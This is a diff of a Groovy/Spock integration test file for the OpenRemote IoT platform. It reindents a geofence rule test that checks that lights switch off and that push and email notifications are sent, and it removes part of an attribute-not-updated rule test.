-            assert bathRoomAsset.getAttribute("lightSwitch").get().value.get()
-        }
+    then: "a geofence refresh notification should have been sent to the console"
+    conditions.eventually {
+      assert pushTargetsAndMessages.size() == 1
+    }
 
-        when: "a user authenticates"
-        def accessToken = authenticate(
-                container,
-                keycloakTestSetup.realmBuilding.name,
-                KEYCLOAK_CLIENT_ID,
-                "testuser3",
-                "testuser3"
-        )
-
-        and: "another user authenticates"
-        def accessToken2 = authenticate(
-                container,
-                keycloakTestSetup.realmBuilding.name,
-                KEYCLOAK_CLIENT_ID,
-                "building",
-                "building"
-        )
-
-        and: "a console is registered by the first user"
-        def authenticatedConsoleResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, accessToken).proxy(ConsoleResource.class)
-        def consoleRegistration = new ConsoleRegistration(null,
-                "Test Console",
-                "1.0",
-                "Android 7.0",
-                new HashMap<String, ConsoleProvider>(
-                        geofence: new ConsoleProvider(
-                                ORConsoleGeofenceAssetAdapter.NAME,
-                                true,
-                                false,
-                                false,
-                                false,
-                                false,
-                                null
-                        ),
-                        push: new ConsoleProvider(
-                                "fcm",
-                                true,
-                                true,
-                                true,
-                                true,
-                                false,
-                                (Map<String, Object>)(parse("{\"token\": \"23123213ad2313b0897efd\"}").orElse(null)
-                                ))
-                ),
-                "",
-                ["manager"] as String[])
-        consoleRegistration = authenticatedConsoleResource.register(null, consoleRegistration)
-
-        and: "a console is registered by the second user"
-        def authenticatedConsoleResource2 = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, accessToken2).proxy(ConsoleResource.class)
-        def consoleRegistration2 = new ConsoleRegistration(null,
-                "Test Console",
-                "1.0",
-                "Android 7.0",
-                new HashMap<String, ConsoleProvider>(
-                        geofence: new ConsoleProvider(
-                                ORConsoleGeofenceAssetAdapter.NAME,
-                                true,
-                                false,
-                                false,
-                                false,
-                                false,
-                                null
-                        ),
-                        push: new ConsoleProvider(
-                                "fcm",
-                                true,
-                                true,
-                                true,
-                                true,
-                                false,
-                                (Map<String, Object>)(parse("{\"token\": \"23123213ad2313b0897efd\"}").orElse(null)
-                                ))
-                ),
-                "",
-                ["manager"] as String[])
-        consoleRegistration2 = authenticatedConsoleResource2.register(null, consoleRegistration2)
-
-        and: "the console attributes are marked as RULE_STATE (inc LOCATION which is needed to trigger the rule)"
-        def asset = assetStorageService.find(consoleRegistration.id)
-        asset.getAttribute(Asset.LOCATION).ifPresent { it.addMeta(new MetaItem<>(MetaItemType.RULE_STATE))}
-        asset.getAttribute(ConsoleAsset.CONSOLE_NAME).ifPresent { it.addMeta(new MetaItem<>(MetaItemType.RULE_STATE))}
-        asset.getAttribute(ConsoleAsset.CONSOLE_VERSION).ifPresent { it.addMeta(new MetaItem<>(MetaItemType.RULE_STATE))}
-        asset = assetStorageService.merge(asset)
-
-        then: "a geofence refresh notification should have been sent to the console"
-        conditions.eventually {
-            assert pushTargetsAndMessages.size() == 1
-        }
-
-        when:"additional users are linked to this console (to help with testing)"
-        assetStorageService.storeUserAssetLinks(
+    when: "additional users are linked to this console (to help with testing)"
+    assetStorageService.storeUserAssetLinks(
             [
-                new UserAssetLink(keycloakTestSetup.realmBuilding.getName(), keycloakTestSetup.testuser2Id, consoleRegistration.id),
-                new UserAssetLink(keycloakTestSetup.realmBuilding.getName(), keycloakTestSetup.buildingUserId, consoleRegistration.id)
+              new UserAssetLink(keycloakTestSetup.realmBuilding.getName(), keycloakTestSetup.testuser2Id, consoleRegistration.id),
+              new UserAssetLink(keycloakTestSetup.realmBuilding.getName(), keycloakTestSetup.buildingUserId, consoleRegistration.id)
             ]
-        )
-
-        and: "the console location is set to the apartment"
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(consoleRegistration.id, Asset.LOCATION.name, ManagerTestSetup.SMART_BUILDING_LOCATION))
-
-        then: "the consoles location should have been updated"
-        conditions.eventually {
-            def testUser3Console = assetStorageService.find(consoleRegistration.id, true)
-            assert testUser3Console != null
-            def assetLocation = testUser3Console.getAttribute(Asset.LOCATION).flatMap { it.value }.orElse(null)
-            assert assetLocation != null
-            assert assetLocation.x == ManagerTestSetup.SMART_BUILDING_LOCATION.x
-            assert assetLocation.y == ManagerTestSetup.SMART_BUILDING_LOCATION.y
-            assert assetLocation.z == ManagerTestSetup.SMART_BUILDING_LOCATION.z
-        }
-
-        then: "the console location asset state should be in the rule engine"
-        conditions.eventually {
-            def assetState = realmBuildingEngine.facts.assetStates.find {it.id == consoleRegistration.id && it.name == Asset.LOCATION.name}
-            assert assetState != null
-            assert assetState.getValue().isPresent()
-            assert assetState.getValue(GeoJSONPoint.class).map{it.x == ManagerTestSetup.SMART_BUILDING_LOCATION.x}.orElse(false)
-            assert assetState.getValue(GeoJSONPoint.class).map{it.y == ManagerTestSetup.SMART_BUILDING_LOCATION.y}.orElse(false)
-        }
-
-        when: "the console device moves outside the home geofence (as defined in the rule)"
-        def outsideLocation = new GeoJSONPoint(0d, 0d)
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(consoleRegistration.id, Asset.LOCATION.name, outsideLocation))
-
-        then: "the apartment lights should be switched off"
-        conditions.eventually {
-            def livingroomAsset = assetStorageService.find(managerTestSetup.apartment2LivingroomId, true)
-            assert !livingroomAsset.getAttribute("lightSwitch").get().value.get()
-            assert livingroomAsset.getAttribute("lightSwitchTriggerTimes").flatMap{it.value}.map{it.length}.orElse(0) == 2
-            assert livingroomAsset.getAttribute("plantsWaterLevels").get().getValue(Map.class).get().get("cactus") == 0.8
-            def bathRoomAsset = assetStorageService.find(managerTestSetup.apartment2BathroomId, true)
-            assert !bathRoomAsset.getAttribute("lightSwitch").get().value.get()
-        }
-
-        and: "a push notification should have been sent to the console via the asset target with the title 'Test title'"
-        conditions.eventually {
-            assert pushTargetsAndMessages.count {it.v2.title == "Test title" && it.v1.type == Notification.TargetType.ASSET && it.v1.id == consoleRegistration.id} == 1
-        }
-
-        and: "two push notifications should have been sent to the consoles via the linked user targets with test-realm-role% realm attribute with the title 'Linked user test'"
-        conditions.eventually {
-            assert pushTargetsAndMessages.count {it.v2.title == "Linked user test" && it.v1.type == Notification.TargetType.ASSET && it.v1.id == consoleRegistration.id} == 1
-            assert pushTargetsAndMessages.count {it.v2.title == "Linked user test" && it.v1.type == Notification.TargetType.ASSET && it.v1.id == consoleRegistration2.id} == 1
-        }
-
-        and: "a push notifications should have been sent to the consoles of the linked user target with test-realm-role-2 realm attribute with the title 'Linked user test 2'"
-        conditions.eventually {
-            assert pushTargetsAndMessages.count {it.v2.title == "Linked user test 2" && it.v1.type == Notification.TargetType.ASSET && it.v1.id == consoleRegistration.id} == 1
-            assert pushTargetsAndMessages.count {it.v2.title == "Linked user test 2" && it.v1.type == Notification.TargetType.ASSET && it.v1.id == consoleRegistration2.id} == 1
-        }
-
-        and: "no push notification should have been sent for the test-realm-role-3 notification action"
-        conditions.eventually {
-            assert pushTargetsAndMessages.count {it.v2.title == "Linked user test 3" && it.v1.type == Notification.TargetType.ASSET && it.v1.id == consoleRegistration.id} == 0
-            assert pushTargetsAndMessages.count {it.v2.title == "Linked user test 3" && it.v1.type == Notification.TargetType.ASSET && it.v1.id == consoleRegistration2.id} == 0
-        }
-
-        and: "an email notification should have been sent to test@openremote.io with the triggered asset in the body but only containing the triggered asset states"
-        conditions.eventually {
-            assert emailMessages.any {it.getRecipients(jakarta.mail.Message.RecipientType.TO).length == 1
-                && (it.getRecipients(jakarta.mail.Message.RecipientType.TO)[0] as InternetAddress).address == "test@openremote.io"
-                && MailUtil.toMailMessage(it, true).content == "<table cellpadding=\"30\"><tr><th>Asset ID</th><th>Asset Name</th><th>Attribute</th><th>Value</th></tr><tr><td>${consoleRegistration.id}</td><td>Test Console</td><td>location</td><td>" + ValueUtil.asJSON(outsideLocation).orElse("") + "</td></tr></table>"}
-        }
-
-        and : "an email notification should have been sent to the asset's linked user(s) (only testuser2 has email notifications enabled)"
-        conditions.eventually {
-            assert emailMessages.any {it.getRecipients(jakarta.mail.Message.RecipientType.TO).length == 1
-                    && (it.getRecipients(jakarta.mail.Message.RecipientType.TO)[0] as InternetAddress).address == "testuser2@openremote.local"
-                    && MailUtil.toMailMessage(it, true).content == "<table cellpadding=\"30\"><tr><th>Asset ID</th><th>Asset Name</th><th>Attribute</th><th>Value</th></tr><tr><td>${consoleRegistration.id}</td><td>Test Console</td><td>location</td><td>" + ValueUtil.asJSON(outsideLocation).orElse("") + "</td></tr></table>"}
-        }
-
-        and: "an localized email notification should have been sent with the triggered asset in the body but only containing the triggered asset states"
-        String expectedHtml = "<table cellpadding=\"30\"><tr><th>Asset ID</th><th>Asset Name</th><th>Attribute</th><th>Value</th></tr><tr><td>${consoleRegistration.id}</td><td>Test Console</td><td>location</td><td>" + ValueUtil.asJSON(outsideLocation).orElse("") + "</td></tr></table>"
-        conditions.eventually {
-            assert localizedMessages.size() == 7
-             // Get only email messages
-            emailMessages = localizedMessages.findAll { localizedMsg ->
-                localizedMsg.getMessages().values().stream().allMatch { message ->
-                    message.type == EmailNotificationMessage.TYPE
-                }
-            }
-
-            // Verify email content
-            assert emailMessages.stream().allMatch {
-                it.getMessages().values().stream().allMatch(m -> {
-                    ((EmailNotificationMessage) m).getHtml() == expectedHtml
-                })
-            }
-
-            assert emailMessages.stream().filter {
-                it.getMessages().values().stream().allMatch {
-                    ((EmailNotificationMessage) it).getSubject() == "Demo Apartment - All Lights Off"
-                }
-            }.count() == 3
-
-            assert emailMessages.stream().filter {
-                it.getMessages().values().stream().allMatch {
-                    ((EmailNotificationMessage) it).getSubject() == "Linked user localized user test"
-                }
-            }.count() == 2
-
-            // Get push messages
-            def pushMessages = localizedMessages.findAll { localizedMsg ->
-                localizedMsg.getMessages().values().stream().allMatch { message ->
-                    message.type == PushNotificationMessage.TYPE
-                }
-            }
-
-            // Verify push notifications
-            def assetIdPushNotification = pushMessages.find { localizedMsg ->
-                localizedMsg.getMessages().get("en") instanceof PushNotificationMessage &&
-                ((PushNotificationMessage) localizedMsg.getMessages().get("en")).getBody()?.contains(consoleRegistration.id)
-            }
-
-            assert assetIdPushNotification != null
-            assert ((PushNotificationMessage) assetIdPushNotification.getMessages().get("en")).getBody() == "English: Asset ${consoleRegistration.id} has moved"
-            assert ((PushNotificationMessage) assetIdPushNotification.getMessages().get("nl")).getBody() == "Nederlands: Asset ${consoleRegistration.id} is verplaatst"
-
-            // Verify no unprocessed placeholders remain
-            assert pushMessages.every { localizedMsg ->
-                localizedMsg.getMessages().values().every { msg ->
-                    !((PushNotificationMessage) msg).getBody()?.contains("%ASSET_ID%")
-                }
-            }
-        }
-
-        and: "a push notification with asset ID should have been sent to both linked users"
-        conditions.eventually {
-            // Count notifications for users with test-realm-role
-            def linkedNotifications = pushTargetsAndMessages.findAll {
-                it.v2.title == "Linked Asset ID Test" &&
-                it.v2.body == "This notification is about asset: ${consoleRegistration.id}"
-            }
-            assert linkedNotifications.size() == 2 // should be sent to both linked users
-        }
-
-        and: "the action URL should contain the corect asset ID"
-        conditions.eventually {
-            // First find the relevant message
-            def targetMessage = pushTargetsAndMessages.find { it.v2.title == "URL Asset ID Test" }
-            assert targetMessage != null
-
-            // Then verify URL
-            assert targetMessage.v2.action?.url == "/assets/${consoleRegistration.id}/details"
-        }
-
-        and: "notifications should still contain asset ID even for user without access"
-        conditions.eventually {
-        assetStorageService.storeUserAssetLinks([
-            new UserAssetLink(keycloakTestSetup.realmBuilding.getName(), keycloakTestSetup.testuser3Id, consoleRegistration.id)
-            ])
-             // Print debug info
-            println "Available notifications:"
-            pushTargetsAndMessages.each { target, msg ->
-                println "Target: ${target}, Message: title='${msg.title}', body='${msg.body}'"
-            }
-
-            assert pushTargetsAndMessages.any {
-                it.v1.type == Notification.TargetType.ASSET &&
-                it.v2.title == "Asset ID Test" &&
-                it.v2.body == "Your asset ID is: ${consoleRegistration.id}"
-            }
-        }
-
-        and: "after a few seconds the rule should not have fired again"
-        new PollingConditions(timeout: 5, initialDelay: 1).eventually {
-            assert pushTargetsAndMessages.findAll {it.v2.title == "Test title"}.size() == 1
-        }
-
-        when: "the console device moves back inside the home geofence (as defined in the rule)"
-        def lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(consoleRegistration.id, Asset.LOCATION.name, ManagerTestSetup.SMART_BUILDING_LOCATION))
-
-        then: "the engine fires at least one more time"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-        }
-
-        and: "the engine should have fired with the console inside the geofence, resetting the rule for the console"
-        awaitInsideGeofenceEvaluated(realmBuildingEngine, consoleRegistration.id, conditions)
-
-        when: "the console device moves outside the home geofence again (as defined in the rule)"
-        emailMessages.clear()
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(consoleRegistration.id, Asset.LOCATION.name, new GeoJSONPoint(-10d, -4d)))
-
-        then: "another notification should have been sent to the console"
-        conditions.eventually {
-            assert pushTargetsAndMessages.findAll {it.v2.title == "Test title"}.size() == 2
-        }
-
-        and: "an email notification should have been sent to test@openremote.io with the triggered asset in the body but only containing the triggered asset states"
-        conditions.eventually {
-            assert emailMessages.any {it.getRecipients(jakarta.mail.Message.RecipientType.TO).length == 1
-                    && (it.getRecipients(jakarta.mail.Message.RecipientType.TO)[0] as InternetAddress).address == "test@openremote.io"
-                    && MailUtil.toMailMessage(it, true).content == "<table cellpadding=\"30\"><tr><th>Asset ID</th><th>Asset Name</th><th>Attribute</th><th>Value</th></tr><tr><td>${consoleRegistration.id}</td><td>Test Console</td><td>location</td><td>" + ValueUtil.asJSON(new GeoJSONPoint(-10d, -4d)).orElse("") + "</td></tr></table>"}
-        }
-
-        when: "the console sends a location update with a new location but still outside the geofence"
-        def timestamp = assetStorageService.find(consoleRegistration.id, true).getAttribute(Asset.LOCATION).flatMap{it.getTimestamp()}.orElse(timerService.getCurrentTimeMillis())
-        def attributeEvent = new AttributeEvent(consoleRegistration.id, Asset.LOCATION.name, new GeoJSONPoint(10d, 10d), timestamp)
-        assetProcessingService.sendAttributeEvent(attributeEvent)
-
-        then: "after a few seconds the rule should not have fired again"
-        new PollingConditions(timeout: 5, initialDelay: 1).eventually {
-            assert pushTargetsAndMessages.findAll {it.v2.title == "Test title"}.size() == 2
-        }
-
-        when: "the ruleset is modified to add a 4hr recurrence per asset"
-        def version = ruleset.version
-        JsonRulesetDefinition jsonRules = ValueUtil.JSON.readValue(ruleset.rules, JsonRulesetDefinition.class)
-        jsonRules.rules[0].recurrence.mins = 240
-        ruleset.rules = ValueUtil.asJSON(jsonRules).orElse(null)
-        ruleset = rulesetStorageService.merge(ruleset)
-
-        then: "the ruleset to be redeployed"
-        conditions.eventually {
-            assert realmBuildingEngine.deployments.find{it.key == ruleset.id}.value.version == version+1
-            assert realmBuildingEngine.deployments.find{it.key == ruleset.id}.value.status == DEPLOYED
-        }
-
-        and: "another notification should have been sent to the console when rule is redeployed"
-        conditions.eventually {
-            assert pushTargetsAndMessages.findAll {it.v2.title == "Test title"}.size() == 3
-        }
-
-        when: "the console device moves back inside the home geofence (as defined in the rule)"
-        lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(consoleRegistration.id, Asset.LOCATION.name, ManagerTestSetup.SMART_BUILDING_LOCATION))
-
-        then: "the engine fires at least one more time"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-        }
-
-        and: "the engine should have fired with the console inside the geofence, resetting the rule for the console"
-        awaitInsideGeofenceEvaluated(realmBuildingEngine, consoleRegistration.id, conditions)
-
-        when: "the console device moves outside the home geofence again (as defined in the rule)"
-        attributeEvent = new AttributeEvent(consoleRegistration.id, Asset.LOCATION.name, new GeoJSONPoint(0d, 0d))
-        assetProcessingService.sendAttributeEvent(attributeEvent)
-
-        then: "after a few seconds the rule should not have fired again"
-        new PollingConditions(timeout: 5, initialDelay: 1).eventually {
-            assert pushTargetsAndMessages.findAll {it.v2.title == "Test title"}.size() == 3
-        }
-
-        when: "the console device moves back inside the home geofence (as defined in the rule)"
-        lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(consoleRegistration.id, Asset.LOCATION.name, ManagerTestSetup.SMART_BUILDING_LOCATION))
-
-        then: "the engine fires at least one more time"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-        }
-
-        and: "the engine should have fired with the console inside the geofence, resetting the rule for the console"
-        awaitInsideGeofenceEvaluated(realmBuildingEngine, consoleRegistration.id, conditions)
-
-        when: "when time advances 5 hours"
-        advancePseudoClock(5, HOURS, container)
-
-        and: "the console device moves outside the home geofence again (as defined in the rule)"
-        attributeEvent = new AttributeEvent(consoleRegistration.id, Asset.LOCATION.name, new GeoJSONPoint(0d, 0d))
-        assetProcessingService.sendAttributeEvent(attributeEvent)
-
-        then: "another notification should have been sent to the console"
-        conditions.eventually {
-            assert pushTargetsAndMessages.findAll {it.v2.title == "Test title" && it.v1.id == consoleRegistration.id}.size() == 4
-        }
-
-        when: "a validity period is added to the ruleset"
-        version = ruleset.version
-        def validityStart = Instant.ofEpochMilli(getClockTimeOf(container)).plus(2, ChronoUnit.HOURS)
-        def validityEnd = Instant.ofEpochMilli(getClockTimeOf(container)).plus(4, ChronoUnit.HOURS)
-        def recur = new Recur<>(Frequency.DAILY, 3)
-        recur.setInterval(2)
-        def calendarEvent = new CalendarEvent(
-                Date.from(validityStart),
-                Date.from(validityEnd),
-                recur)
-        ruleset.setValidity(calendarEvent)
-        ruleset = rulesetStorageService.merge(ruleset)
-
-        then: "the ruleset should be redeployed and paused until 1st occurrence"
-        conditions.eventually {
-            assert realmBuildingEngine.deployments.find{it.key == ruleset.id}.value.version == version+1
-            assert realmBuildingEngine.deployments.find{it.key == ruleset.id}.value.status == PAUSED
-        }
-
-        when: "the same AttributeEvent is sent"
-        timestamp = attributeEvent.getTimestamp()+1
-        attributeEvent.setTimestamp(timestamp)
-        assetProcessingService.sendAttributeEvent(attributeEvent)
-
-        then: "the event should have been committed to the DB"
-        conditions.eventually {
-            def console = assetStorageService.find(consoleRegistration.id, true)
-            assert console.getAttribute(Asset.LOCATION).flatMap{it.getTimestamp()}.orElse(0) == timestamp
-        }
-
-        and: "no notification should have been sent as outside the validity period"
-        assert pushTargetsAndMessages.findAll {it.v2.title == "Test title"}.size() == 4
-
-        when: "time advances to inside the validity period"
-        advancePseudoClock(3, HOURS, container)
-
-        then: "the ruleset should be unpaused (1st occurrence)"
-        conditions.eventually {
-            assert realmBuildingEngine.deployments.find{it.key == ruleset.id}.value.status == DEPLOYED
-        }
-
-        when: "the same AttributeEvent is sent"
-        timestamp = attributeEvent.getTimestamp()+1
-        attributeEvent.setTimestamp(timestamp)
-        assetProcessingService.sendAttributeEvent(attributeEvent)
-
-        then: "the event should have been committed to the DB"
-        conditions.eventually {
-            def console = assetStorageService.find(consoleRegistration.id, true)
-            assert console.getAttribute(Asset.LOCATION).flatMap{it.getTimestamp()}.orElse(0) == timestamp
-        }
-
-        and: "another notification should have been sent as inside the validity period"
-        conditions.eventually {
-            assert pushTargetsAndMessages.findAll {it.v2.title == "Test title"}.size() == 5
-        }
-
-        when: "time advances past the validity period"
-        advancePseudoClock(1, HOURS, container)
-
-        then: "the ruleset should become paused again (until next occurrence)"
-        conditions.eventually {
-            assert realmBuildingEngine.deployments.find{it.key == ruleset.id}.value.status == PAUSED
-        }
-
-        when: "the same AttributeEvent is sent"
-        timestamp = attributeEvent.getTimestamp()+1
-        attributeEvent.setTimestamp(timestamp)
-        assetProcessingService.sendAttributeEvent(attributeEvent)
-
-        then: "the event should have been committed to the DB"
-        conditions.eventually {
-            def console = assetStorageService.find(consoleRegistration.id, true)
-            assert console.getAttribute(Asset.LOCATION).flatMap{it.getTimestamp()}.orElse(0) == timestamp
-        }
-
-        and: "no notification should have been sent as outside the validity period"
-        assert pushTargetsAndMessages.findAll {it.v2.title == "Test title"}.size() == 5
-
-        when: "time advances to inside the next validity period"
-        advancePseudoClock(47, HOURS, container)
-
-        then: "eventually the ruleset should be unpaused (next occurrence)"
-        conditions.eventually {
-            assert realmBuildingEngine.deployments.find{it.key == ruleset.id}.value.status == DEPLOYED
-        }
-
-        when: "time advances past the validity period"
-        advancePseudoClock(1, HOURS, container)
-
-        then: "the ruleset should become paused again (until last occurrence)"
-        conditions.eventually {
-            assert realmBuildingEngine.deployments.find{it.key == ruleset.id}.value.status == PAUSED
-        }
-
-        when: "time advances to inside the next validity period"
-        advancePseudoClock(47, HOURS, container)
-
-        then: "eventually the ruleset should be unpaused (last occurrence)"
-        conditions.eventually {
-            assert realmBuildingEngine.deployments.find{it.key == ruleset.id}.value.status == DEPLOYED
-        }
-
-        when: "time advances past the validity period"
-        advancePseudoClock(1, HOURS, container)
-
-        then: "the ruleset should expire"
-        conditions.eventually {
-            assert realmBuildingEngine.deployments.find{it.key == ruleset.id}.value.status == EXPIRED
-        }
-
-        cleanup: "static variables are reset and the mock is removed"
-        if (originalDebounceMillis != null) {
-            ORConsoleGeofenceAssetAdapter.NOTIFY_ASSETS_DEBOUNCE_MILLIS = originalDebounceMillis
-        }
-        if (notificationService != null) {
-            notificationService.notificationHandlerMap.put(emailNotificationHandler.getTypeName(), emailNotificationHandler)
-            notificationService.notificationHandlerMap.put(pushNotificationHandler.getTypeName(), pushNotificationHandler)
-        }
+            )
+
+    and: "the console location is set to the apartment"
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(consoleRegistration.id, Asset.LOCATION.name, ManagerTestSetup.SMART_BUILDING_LOCATION))
+
+    then: "the consoles location should have been updated"
+    conditions.eventually {
+      def testUser3Console = assetStorageService.find(consoleRegistration.id, true)
+      assert testUser3Console != null
+      def assetLocation = testUser3Console.getAttribute(Asset.LOCATION).flatMap {
+        it.value
+      }.orElse(null)
+      assert assetLocation != null
+      assert assetLocation.x == ManagerTestSetup.SMART_BUILDING_LOCATION.x
+      assert assetLocation.y == ManagerTestSetup.SMART_BUILDING_LOCATION.y
+      assert assetLocation.z == ManagerTestSetup.SMART_BUILDING_LOCATION.z
     }
 
-    def "Trigger actions when an attribute is not updated for a specified duration"() {
-
-        given: "the container environment is started"
-        def conditions = new PollingConditions(timeout: 15, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def rulesService = container.getService(RulesService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-        def timerService = container.getService(TimerService.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        RulesEngine realmBuildingEngine
-
-        and: "the pseudo clock is stopped"
-        stopPseudoClock()
-
-        when: "a light asset is added to the building realm"
-        def lightId = UniqueIdentifierGenerator.generateId("LightTest")
-        def lightAsset = new LightAsset("LightTest")
-                .setId(lightId)
-                .setRealm(keycloakTestSetup.realmBuilding.name)
-                .setLocation(new GeoJSONPoint(0, 0))
-
-        def ruleState = new MetaItem<>(MetaItemType.RULE_STATE)
-        lightAsset.getAttributes().get("brightness").get().addMeta(ruleState)
-        lightAsset.getAttributes().get("onOff").get().addMeta(ruleState)
-        assetStorageService.merge(lightAsset)
-
-        then: "the light asset should be present"
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light != null
-        }
-
-        // RuleSet: WHEN:
-        // Any light asset has its onOff attribute not updated for 3 minutes
-        // AND
-        // Any light asset has its brightness attribute greater than 50
-        // THEN:
-        // Set the notes of the light asset to "Matched"
-        when: "a ruleset with a notUpdatedFor attribute condition has been added"
-        def rulesStr = getClass().getResource("/org/openremote/test/rules/JsonNotUpdatedForRule.json").text
-        def rule = parse(rulesStr, JsonRulesetDefinition.class).orElseThrow()
-        Ruleset ruleset = new RealmRuleset(
-                keycloakTestSetup.realmBuilding.name,
-                "Not Updated For Rule",
-                Ruleset.Lang.JSON,
-                rulesStr)
-        ruleset = rulesetStorageService.merge(ruleset)
-        def lastFireTimestamp = 0
-
-        then: "the rule engines to become available and be running with asset states inserted"
-        conditions.eventually {
-            realmBuildingEngine = rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name)
-            assert realmBuildingEngine != null
-            assert realmBuildingEngine.isRunning()
-            assert realmBuildingEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_BUILDING + 2 // 2 additional rule states
-            assert realmBuildingEngine.lastFireTimestamp == timerService.getNow().toEpochMilli()
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        }
-
-        when: "the light asset is updated with onOff set to true and brightness set to 100"
-        lightAsset = assetStorageService.find(lightId)
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(lightId, LightAsset.BRIGHTNESS, 100))
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(lightId, LightAsset.ON_OFF, true))
-
-        then: "the light asset should have its onOff attribute set to true and brightness set to 100"
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("onOff").get().getValue().orElse(false) == true
-            assert light.getAttribute("brightness").get().getValue().orElse(0) == 100
-        }
-
-        when: "time advances for 6 seconds"
-        advancePseudoClock(6, TimeUnit.SECONDS, container)
-
-        then: "the rule engine should have fired"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        }
-
-        and: "the light asset note attribute should still be empty"
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("notes").get().getValue().orElse("") == ""
-        }
-
-        when: "time advances for 1 minute"
-        advancePseudoClock(1, TimeUnit.MINUTES, container)
-
-        then: "the rule engine should have fired"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        }
-
-        and: "the light asset note attribute should still be empty"
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("notes").get().getValue().orElse("") == ""
-        }
-
-        when: "time advances for 2 minutes"
-        advancePseudoClock(2, TimeUnit.MINUTES, container)
-
-        then: "the rule engine should have fired"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        }
-
-        and: "the light asset note attribute should be set to Matched" // because onOff was still unchanged for 3 minutes and brightness was above 50
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("notes").get().getValue().orElse("") == "Matched"
-        }
-
-        when: "brightness is updated to 0 and notes is updated to empty"
-        lightAsset = assetStorageService.find(lightId)
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(lightId, LightAsset.BRIGHTNESS, 0))
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(lightId, LightAsset.NOTES, ""))
-
-        then: "the light asset should have its brightness set to 0 and notes set to empty"
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("brightness").get().getValue().orElse(0) == 0
-            assert light.getAttribute("notes").get().getValue().orElse("") == ""
-        }
-
-        when: "time advances for 6 seconds"
-        advancePseudoClock(6, TimeUnit.SECONDS, container)
-
-        then: "the rule engine should have fired"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        }
-
-        when: "brightness is updated to 100"
-        lightAsset = assetStorageService.find(lightId)
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(lightId, LightAsset.BRIGHTNESS, 100))
-
-        then: "the light asset should have its brightness set to 100"
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("brightness").get().getValue().orElse(0) == 100
-        }
-
-        and: "notes should still be empty until the rule engine fires"
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("notes").get().getValue().orElse("") == ""
-        }
-
-        when: "time advances for 6 seconds"
-        advancePseudoClock(6, TimeUnit.SECONDS, container)
-
-        then: "the rule engine should have fired"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        }
-
-        and: "the light asset note attribute should be set to Matched" // because onOff was still unchanged for 3 minutes and brightness was set to be above 50 again
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("notes").get().getValue().orElse("") == "Matched"
-        }
+    then: "the console location asset state should be in the rule engine"
+    conditions.eventually {
+      def assetState = realmBuildingEngine.facts.assetStates.find {
+        it.id == consoleRegistration.id && it.name == Asset.LOCATION.name
+      }
+      assert assetState != null
+      assert assetState.getValue().isPresent()
+      assert assetState.getValue(GeoJSONPoint.class).map{
+        it.x == ManagerTestSetup.SMART_BUILDING_LOCATION.x
+      }.orElse(false)
+      assert assetState.getValue(GeoJSONPoint.class).map{
+        it.y == ManagerTestSetup.SMART_BUILDING_LOCATION.y
+      }.orElse(false)
     }
 
-    def "Trigger actions when attribute conditions match for specified durations"() {
-
-        given: "the container environment is started"
-        def conditions = new PollingConditions(timeout: 15, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def rulesService = container.getService(RulesService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-        def timerService = container.getService(TimerService.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        RulesEngine realmBuildingEngine
-
-        and: "the pseudo clock is stopped"
-        stopPseudoClock()
-
-        when: "a light asset is added to the building realm"
